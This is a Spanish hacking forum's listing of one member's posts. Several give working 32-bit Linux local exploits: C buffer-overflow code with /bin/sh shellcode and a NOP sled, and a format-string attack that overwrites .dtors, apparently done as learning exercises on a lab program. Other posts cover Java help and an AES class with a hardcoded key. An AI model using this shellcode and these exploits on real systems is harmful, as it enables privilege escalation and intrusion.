Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Mensajes - z0mw33d

Páginas: [1] 2 3 4 5

C / C++ / Re:no puedo hacer funcionar este exploit para linux

« en: Noviembre 11, 2013, 12:33:29 am »

Para quitarme la espina ...

Este funciona perfectamente, el codigo esta sacado de phrack. Ya depende del tamaño del buffer a explotar.

Código: [Seleccionar]

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NOP		0x90
#define SIZE_DEFAULT	512
#define OFFSET		0

unsigned long getESP(void){ __asm__("movl %esp,%eax"); }

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char* argv[]) {
	char *buff, *buff_cptr;
	long *buff_lptr, addr_offset;
	int bsize, offset;
  	int i;
		
	if( argc <= 1 )
	{ 
		printf("Uso: ./exploit2 size offset \n"); 
		return 0; 
	}

	bsize  = ( argc > 1 ) ? atoi(argv[1]) : SIZE_DEFAULT;
	offset = ( argc > 2 ) ? atoi(argv[2]) : OFFSET;

	if( !(buff = malloc(bsize)) ) 
	{
		printf("No se puede reservar memoria\n");
		return 1;
	}

	addr_offset = getESP() - offset;
	printf("Offset addr :: 0x%x\n", addr_offset);
		
	buff_cptr = buff;	
	buff_lptr = (long *) buff_cptr;
	for (i=0; i< bsize; i+=4)
		*(buff_lptr++) = addr_offset;

	for (i=0; i< (bsize/2); i++)
		buff[i] = NOP;
	
	buff_cptr = buff + ( (bsize/2) - (strlen(shellcode)/2) );
	for (i=0; i < strlen(shellcode); i++)
		*(buff_cptr++) = shellcode[i];
	
	memcpy(buff, "EGG=", 4);
	putenv(buff);
	system("/bin/bash");

	return 0;
}

Entre los errores que veo en el codigo de girmoire...

No realiza el desplazamiento relativo al esp.
Utiliza NOPs que ayuda para encontrar la shellcode pero 'lo sobreescribe' con la copia a buffer de la shellcode y la direccion ret, lo cual hace 'inutil esa ayuda' y tambien podias escribir mas veces la direccion ret( offset relativo al esp)...
El \x00\x00\x00\x00 ?¿porque?

C / C++ / Re:no puedo hacer funcionar este exploit para linux

« en: Noviembre 07, 2013, 12:22:54 am »

No se si debería postear ya que el tema es algo viejo pero como a mi me ayudaron hay va..

Quizás se me escape algo ya que soy nuevo en esto pero a ese exploit no le veo sentido. Según el código el exploit arma la cadena (nops+shellcode etc) y crea una variable de entorno con ella para que despues el programa le devuelva una shell. ¿?.

¿¿Supongo bien si digo que la idea es ejecutar desde esa shell el programa vulnerable y de alguna forma enviarle la dirección de memoria de esa variable de entorno??... como digo quizás se me escapa algo ( por ejemplo no se el porque de ese EGG= ) pero no le veo sentido.

Te dejo una forma que a mi me a funcionado. Toleren mi código! xD.

Código: [Seleccionar]

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define SIZE_STRING 100
#define SIZE_NOP  27

char SHELLCODE[] = "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x6a\x0b\x51\x52\x53\x83\xec\x10\x61\xcd\x80\xb0\xf6\xff\xbf"; 

int
main( int argc, char* argv[])
{
	int size_total = SIZE_STRING+SIZE_NOP+ strlen(SHELLCODE) ;
	char buff[ size_total ];

	int i;
	for( i=0; i < SIZE_STRING ; i++)
	{
		buff[i] = 'Z';
	}	
	
	for( i=SIZE_STRING; i < SIZE_STRING+SIZE_NOP; i++ )
	{
		buff[i] = '\x90';
	}

	memcpy(buff+ (SIZE_STRING+SIZE_NOP), SHELLCODE, strlen(SHELLCODE) );
	
	execlp("./war1", "war1", buff, NULL);

	return 0;
}

PD: y la primera en la frente!.. como he dicho soy nuevo en estas cosas y la respuesta lo deja claro

. Leyendo el paper de Aleph One veo que aparece lo del egg e incluso ese tipo de exploit con lo cual peor aún... pero bueno a mi ese me funciono!. ¿Te debería dar las gracias? xD.

Retroalimentación / Re:Tema constructivo ( previamente cerrado )

« en: Diciembre 13, 2012, 11:57:25 pm »

Yo la verdad es que no entiendo muy bien eso de que presentarse es un sintoma de respeto... seguramente el 50% de las respuestas a presentaciones son por "protocolo"...

Tal y como yo lo veo el respeto al foro se debe traducir en posts con contenido, ya sea para aportar o para preguntar, evitando respuestas a temas como los mencionados anteriormente. Hay gente que hasta te deja el enunciado xD!...

Saludos

GNU / Linux / Re:Distro de Linux

« en: Diciembre 10, 2012, 04:12:35 pm »

Buenas, Pablo511.

Si no usastes nunca ñu/linux xD, yo te recomiendo linux mint, debian o trisquel, hay muchas y bueno para gustos colores...
hay puedes correr aircrack y programas como los que traen wifiway y ademas puedes ir haciendote al sistema.

Saludos

Hacking / Re:[ AYUDA ] Problema format string + shellcode + .dtors

« en: Diciembre 09, 2012, 07:49:49 pm »

Lo curioso es que no me da ningun error, el programa termina correctamente. El ejemplo es con la segunda shellcode.

Cuando ejecuto por ejemplo : ./fstring_1 `perl -e 'print "\x12\x95\x04\x08\x10\x95\x04\x08";'`%.49142d%4\$hn%.15897d%5\$hn

variable de entorno : 0xbffffe18
.dtors_end : 0x08049510

Me lanza una maraña de 0's, y termina escribiendo 1023. Como si me escribiera la longitud de la variable buf estando llena. Lo curioso es que entre tanto 0 de repente se ve un numero ejem (1079011952), que por lo que he probado, en el gdb el numero varia segun la "longitud" de la variable de entorno porque si quito o añado nops me resta o suma respectivamente los nops quitados o añadidos pero si no uso gdb y ejecuto a pelo como lo puse arriba, el numero varia segun los $.XXXXXd del final, con lo cual lleva a pensar que algo pasa con la shellcode. El numero aparece en el registro eax cuando se ejecuta add $0x04,%eax, y lo pierdo con mov %eax,0x4(%esp), esto no se si ayuda o no pero bueno...

En probado tambien en backtrack y hay me lanza un SIGSEGV despues de todos los 0s escritos y el 1023. El programa lo compilo con -fno-stack-protector, -fno-stack-check y le paso execstack, aslr desactivado. Las shellcode las he probado por separado y me funciona bien. Mi conclusion: estoy mas perdido que un chivo en un garaje... jeje.

¿Los 0 se imprimen por los %.xxxxxxd verdad?,
¿es posible que a la hora de ejecutar la shellcode tenga por alguna lado basura y por eso no se ejecute?
¿alguna idea?, ya me da igual si saco la shell o no xD solo quiero sacar algo en claro.

un saludo y gracias!.

Hacking / [ AYUDA ] Problema format string + shellcode + .dtors

« en: Diciembre 05, 2012, 11:45:53 pm »

buenas, estoy siguiendo la guia de set-ezine donde enseña como funciona los format string. La cosa es que no consigo ejecutar la shellcode almacenada en la variable de entorno.

Codigo:

Código: [Seleccionar]

int main(int argc, char **argv) {
        char buf[1024];
        strncpy(buf, argv[1], sizeof(buf) - 1);

        printf(buf);

        return 0;
}

He almacenado la shellcode junto con los NOPS en una var de entorno, localizo la direccion con getenv (aslr desactivado), localizo la direccion de _.dtors_end_ con objdump, y esta ultima la sobreescribo con la direccion de la shellcode, hasta aqui todo bien pero... no ejecuta la shellcode.

revisando con gdb el _dtor_end esta bien sobreescrito

Código: [Seleccionar]

[b] x/16x 0x08049514[/b]
0x8049510 <__DTOR_END__>:	0x00000000	0xbffffedf	0x00000001	0x00000010
0x8049520 <_DYNAMIC+8>:	0x0000000c	0x080482c0	0x0000000d	0x080484dc
0x8049530 <_DYNAMIC+24>:	0x00000004	0x0804816c	0x6ffffef5	0x08048198
0x8049540 <_DYNAMIC+40>:	0x00000005	0x08048218	0x00000006	0x080481b8

He probado tanto en los primeros +4 bytes como en los +8 bytes como se ve en la imagen. (en la imagen uso +8) pero cuando examino la direccion de 0xbffffedf no encuentro por ningun lado la shellcode. Deberia ser facil ver porque los NOPS cantan pero no veo na...lo que veo es ....

Código: [Seleccionar]

 [b]x/50x 0xbffffedf[/b] 
0x785c3063	0x785c3838	0x785c3634	0x785c3730
0xbffffeef:	0x785c3938	0x785c3634	0x785c6330	0x785c3062
0xbffffeff:	0x785c6230	0x785c3938	0x785c3366	0x785c6438
0xbfffff0f:	0x785c6534	0x785c3830	0x785c6438	0x785c3635
0xbfffff1f:	0x785c6330	0x785c6463	0x785c3038	0x785c3133
0xbfffff2f:	0x785c6264	0x785c3938	0x785c3864	0x785c3034
0xbfffff3f:	0x785c6463	0x785c3038	0x785c3865	0x785c6364
0xbfffff4f:	0x785c6666	0x785c6666	0x622f6666	0x732f6e69
0xbfffff5f:	0x49440068	0x414c5053	0x303a3d59	0x4300302e
0xbfffff6f:	0x524f4c4f	0x4d524554	0x6f6e673d	0x742d656d
0xbfffff7f:	0x696d7265	0x006c616e	0x54554158	0x49524f48
0xbfffff8f:	0x2f3d5954	0x2f726176	0x2f6e7572	0x336d6467
0xbfffff9f:	0x7475612f	0x6f662d68

La shellcode la tengo en un fichero y la cargo a la variable asi, export ZW=`perl -e 'print "\x90"x100'``cat fichero`
¿es correcto? agradeceria si alguien me puede orientar un poco...

EDITO:
He conseguido localizar los nops y la shellcode, no la estaba cargando bien en la variable pero aun asi sigue sin ejecutarse. La shellcode es esta: \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh.

Código: [Seleccionar]

0xbfffff1f:	0x90909090	0x90909090	0x90909090	0x90909090
0xbfffff2f:	0x90909090	0x895e1feb	0xc0310876	0x89074688

EDITO: He probado a utilizar la misma shellcode pero esta vez sobreescribiendo la direccion del RET en la funcion main , y me a funcionado perfectamente.... he vuelto a probar y nada. ¿alguna idea?

gracias y saludos

C / C++ / [ C ] Buscando alias en nuestro sistema

« en: Diciembre 01, 2012, 02:03:27 am »

jende ona!

Bueno os dejo un script que busca los alias de los usuarios del sistema. Lo he montando con la idea de poder usarlo junto con cron y que avise si detecta cambios en los .bashrc, seguramente se pueda perfeccionar mucho mas pero estoy dandole ahora a C y poco a poco..

. La forma que tiene de informanos es ejecutando un scrip bash que lanza un dialog con zenity.

Código: [Seleccionar]

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <dirent.h>
#include <unistd.h>

void findAliasInsecures(char *name_file);
void getAlias(char *linea, int indice);
int isAlias(char *linea);
int existLog(void);

FILE *file_log;

int main(){
	DIR *dir;
	struct dirent *info;
	int log = existLog();
	
	if ( getuid() != 0 ){
		printf("#########################################################\n");
		printf("#			      ,,,			#\n");
		printf("#			     /\\				#\n");
		printf("#			    (__)			#\n");
		printf("#							#\n");
		printf("#! Script para localizar los alias de nuestro sistema. !#\n");
		printf("#! Codeado por z0mw33d				       !#\n");
		printf("#! ____________________________________________________!#\n");
		printf("#! Uso : ./zwAliados				       !#\n");
		printf("#! JOU! Es necesario ser root.			       !#\n\n");
		
		return 0;
	}
	
	if ( log == -1 ){
		if ( (file_log = fopen(".logAlias.txt","w")) == NULL )
			return 0;
	}else{    		
		if ( (file_log = fopen("hzwhhxc.txt","w")) == NULL )
			return 0;
			
	}	
							
	if ( (dir = opendir("/home/")) == NULL )
		fprintf(file_log,"%s\n","[ ERROR ]: No se pudo abrir el directorio /home/.");
	else{	
		fprintf(file_log,"%s\n","[ INFO ]: Directorios Encontrados.");
		while( (info = readdir(dir)) != NULL ){
			
			if ( (strcmp(info->d_name,".") != 0) && (strcmp(info->d_name,"..") != 0) ){
				fprintf(file_log,"%s%s%s\n","[ INFO ]: Directorio: /home/",info->d_name,"/.bashrc");
				fprintf(file_log,"%s\n","[ INFO ]: Alias encontrados...");
				findAliasInsecures(info->d_name);
			}
		}
			
		fprintf(file_log,"%s\n","[ INFO ]: Directorio: /root/.bashrc");
		fprintf(file_log,"%s\n","[ INFO ]: Alias encontrados...");
		findAliasInsecures("/root/.bashrc");
	}
	
	if ( closedir(dir) != 0 )
		fprintf(file_log,"%s\n","[ ERROR ]: El directorio /home/ no se ha cerrado correctamente.");
	
	fclose(file_log);
	
	if ( log == 0 ){
		system("./CheckAndWarns.sh");
		remove("hzwhhxc.txt");
	}
					
	return 0;
}

/**
* Descripcion : Abre el fichero .bashrc para el usuario en cuestion, comprobando si tiene alias o no.
* @param char *name_file puntero char al nombre del fichero
*/
void findAliasInsecures(char *name_file){
	FILE *file_bash;
	char *ruta;
	int  numCharsLine = 1;
	char *buffer = malloc(numCharsLine*sizeof(char));
	char x;
	
	if ( strcmp(name_file,"/root/.bashrc") != 0 ){
		ruta = malloc( (strlen("/home/")+strlen(name_file)+strlen("/.bashrc")+2)*sizeof(char));
		strcat(ruta,"/home/");
		strcat(ruta,name_file);		
		strcat(ruta,"/.bashrc");
	}else
		ruta = name_file;
	
	if ( (file_bash = fopen(ruta,"r")) == NULL )
		fprintf(file_log,"%s%s\n","[ ERROR ]: No se puedo abrir el fichero.",ruta);
	else{
		while( (x = fgetc(file_bash)) != EOF ){
			if ( x != '\n' ){
				buffer[numCharsLine-1] = x;
				numCharsLine++;
				buffer = realloc(buffer,numCharsLine*sizeof(char));
			}else{
				buffer[numCharsLine-1] = '\n';
				if ( strlen(buffer) > 1 ){
					numCharsLine = isAlias(buffer);
					if ( numCharsLine > -1 )
						getAlias(buffer,numCharsLine);
				}
				numCharsLine = 1;
				buffer = malloc(numCharsLine*sizeof(char));
			}
			
		}
	}
	
	if ( fclose(file_bash) != 0 )
		fprintf(file_log,"%s%s%s\n","[ ERROR ]: EL fichero ",ruta," no se cerró correctamente.");
		
	if ( strcmp(name_file,"/root/.bashrc") != 0 )
		free(ruta);
	
	free(buffer);
}

/**
* Descripcion : Guarda el alias en el fichero log... ^^
* @param char *linea puntero char a la linea leida del fichero
*/
void getAlias(char *linea,int indice){
	int i;
	
	fputc((int)'\t',file_log);
	for(i=indice; i<strlen(linea); i++){
		if ( linea[i] == '\n')
			break;
		fputc((int)linea[i],file_log);
	}
	fputc((int)'\n',file_log);
}

/**
* Descripcion : Localiza la posicion del alias en la linea leida del fichero
* @param char *linea puntero char a la linea leida del fichero
* @return -1 si no se encontro ninguna orden alias, la posicion desde donde localizar el alias en caso contrario
*/

int isAlias(char *linea){
	int i=-1;
	
  	do{
  		i++;
  	}while ( (linea[i] == '\t' || linea[i] == ' ') && ((i+1) < strlen(linea)) );
  	
  	if ( strcmp(strndup(linea+i,5),"alias") == 0 )
  		return i+6;
  		
  	return -1;
}

/**
* Descripcion : Comprueba si el fichero .logAlias.txt existe.
* @return -1 si el fichero no existe, 0 en caso contrario
*/

int existLog(){
	FILE *file_tmp;
	
	if ( (file_tmp = fopen(".logAlias.txt","r")) == NULL )
		return -1;
	else
	     fclose(file_tmp);
	     
	return 0;
}

Código: [Seleccionar]

#!/bin/bash

#########################################################
#			      ,,,			#
#			     /\				#
#			    (__)			#
#							#
#  Script para localizar los alias de nuestro sistema.  #
#  Codeado por z0mw33d				        #
#_______________________________________________________#
#  Uso : ./CheckAndWarns			        #
#  						        #
#########################################################

if [ -f ".logAlias.txt" ]; then
	if [ -f "hzwhhxc.txt" ]; then
		hashLog=`sha256sum .logAlias.txt | cut -d " " -f 1`
		hashTmp=`sha256sum hzwhhxc.txt | cut -d " " -f 1`
		if [ $hashLog != $hashTmp ]; then
			zenity --info --text="La lista de alias en el sistema a cambiado"	
		fi
	fi
fi

Edito: Si alguien ve algo feo espero que lo diga

Java y Android / Re:Problemas con JTree

« en: Septiembre 28, 2012, 12:21:50 pm »

Creo que te falta el modelo de datos para el JTree, por ejemplo ...

Código: [Seleccionar]

DefaultMutableTreeNode arbol = new DefaultMutableTreeNode("arbol");
DefaultTreeModel modelo = new DefaultTreeModel(arbol);
JTree tree = new JTree(modelo); 

DefaultMutableTreeNode padre = new DefaultMutableTreeNode("padre");
DefaultMutableTreeNode hijo=new DefaultMutableTreeNode("hijo");

modelo.insertNodeInto(padre,arbol,0);
modelo.insertNodeInto(hijo, padre, 0);

He utilizado el modelo para agregar los datos porque en caso de cambios se refresca solo, si utilizamos los metodos de add, insert etc de cada nodo, tendras que resfrescarlos tu directamente con repaint() o con los metodos fire*().

No se si el modelo es necesario si o si pero yo hasta ahora he trabajado con el ^^.

Un salud0.

Forense / Re:Analisis Forence a dispositivos moviles y mas (libros)

« en: Julio 15, 2012, 07:28:02 pm »

excelente tio, gracias por la resubida, descargando (^_-).

un saludo.

Java y Android / Re:Cifrar/Descifrar datos con AES 256

« en: Julio 10, 2012, 11:12:57 pm »

yo tampoco se el porque de esto, quizas se les olvido y parchearon xDD

edito: he estado probando y las cadenas convertidas a string(ya cifradas) no pueden ser recuperables. Solo puedes recuperarla teniendo el array de bytes original. He cambiado la funcion asHex(), la cual tenia el fin de convertir el array de bytes cifrados a string para ser mas entendible y lo he sustituido por sun.misc.BASE64Encoder().encode("array bytes datos cifrados"); , la convierto a base64, quedando la clase de la siguiente manera, ahora por ejemplo podemos usarla para cifrar datos en ficheros

Código: [Seleccionar]

package projectclase_servidor;

import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;


public class AESCrypt {
    
    private static final String llaveSimetrica = "clave de 16 caracteres o multiplo de 16";
        
    public static String encDatos(String cadena){
        byte [] aError = null;
        SecretKeySpec key = new SecretKeySpec(llaveSimetrica.getBytes(), "AES");
        Cipher cipher;
        try {
                cipher = Cipher.getInstance("AES");
                //Comienzo a encriptar
                cipher.init(Cipher.ENCRYPT_MODE, key);
                byte[] datosCifrados = cipher.doFinal(cadena.getBytes()); //cadena = a texto a cifrar
                /*
                 * TODO: Representar los bytes como string vía base64, así será
                 * humanamente leíble. La otra opción es expresar como hexadecimal
                 * 
                 * En este caso lo imprimo en pantalla como bytes.
                 */
                return new sun.misc.BASE64Encoder().encode(datosCifrados);
        } catch (Exception e) {
                return null;
        }
    
    }
    
    public static String dencDatos(String datosCifrados){
        SecretKeySpec key = new SecretKeySpec(llaveSimetrica.getBytes(), "AES");
        Cipher cipher;
        try {
                cipher = Cipher.getInstance("AES");
               
                //Comienzo a desencriptar
                cipher.init(Cipher.DECRYPT_MODE, key);
                byte[] datosDecifrados = cipher.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(datosCifrados));
                return new String(datosDecifrados); 
                /*
                 * TODO: Representar los bytes como string vía base64, así será
                 * humanamente leíble. La otra opción es expresar como hexadecimal
                 * 
                 * En este caso lo imprimo en pantalla como bytes.
                 */
        } catch (Exception e) {
                return null;
        }  
    }
}

un saludo

Java y Android / Re:Duda sobre una actividad de leer cadenas de caracteres

« en: Julio 10, 2012, 09:58:28 pm »

buenas duende

Citar

Un ejemplo de su uso sería:
*
* System.out.println("Introduzca un String: ");
* String unString = Lector.leerString();
* System.out.println("El String introducido es: " + unString);

La clase lector solo te sirve para recoger los datos que el usuario te da, mediante metodos estaticos. Crea una clase aparte que contenga todos los metodos que te piden , y en su main haz uso de la clase lector para recoger los datos y utilizar estos metodos. Asi es como lo veo yo... (^_^)

SaLv2

Java y Android / Re:Método para buscar elemento en matriz

« en: Julio 10, 2012, 08:29:40 pm »

pero ... ¿y el error del if ? xD.

el equals suele usarse mas para objetos y tu diria que trabajas en estructurado, prueba a quitarle el equals y hacer la condicion directamente matriz == valor.

por cierto, saludos.

Java y Android / Re:Método para buscar elemento en matriz

« en: Julio 10, 2012, 07:50:31 pm »

¿y que error te tira en el if?

Citar

estoy intentando hacer un método que me busque un elemento de la matriz y me diga en que fila y columna esta, y si hay varios elementos iguales que diga todos

.

de momento podrias contabilizar las veces que se repite el numero, que el result que tienes se queda un poco capado para lo que quieres realmente.

Quizas te interese clases de verano con el maestro FaCu (^_^) --> http://foro.hackxcrack.net/forum/index.php?topic=12686.0

PD: intenta poner los codigos dentro de las etiquetas code, mucho mejor para todos (^_-).

Java y Android / Re:Ayuda con mi coversor de texto a binario

« en: Julio 10, 2012, 02:19:19 pm »

de nada, aunque te aconsejo utilizar el debbuger para poder analizar como esta corriendo verdaderamente el codigo. Con codigos pequeños no tendrias que tener problemas a la hora de analizarlo.

S4Lv2

Java y Android / Re:Ayuda con mi coversor de texto a binario

« en: Julio 10, 2012, 04:41:13 am »

buenas NuLL

he probado sin el scanner y me tira bien los datos. Prueba a cambiar in.next() por in.nextLine(), haber que tal.. quizas solo coja el hola.

saludos

Páginas: [1] 2 3 4 5